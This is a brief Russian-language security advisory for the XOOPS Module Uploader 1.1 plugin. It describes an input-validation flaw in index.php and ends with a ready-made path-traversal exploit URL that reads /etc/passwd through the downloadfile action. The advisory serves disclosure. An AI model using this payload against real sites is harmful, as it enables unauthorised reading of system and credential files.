Программа: XOOPS Module Uploader 1.1
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный
доступ к конфиденциальной информации на целевой системе. Уязвимость существует
из-за ошибки в проверке входных данных сценарием index.php. Атакующий может
получить несанкционированный доступ к конфиденциальной информации на целевой
системе.
Эксплоит:
http://localhost/modules/uploader/index.php?action= downloadfile&filename=../../../../../../../../../../../../../../../../etc/passwd
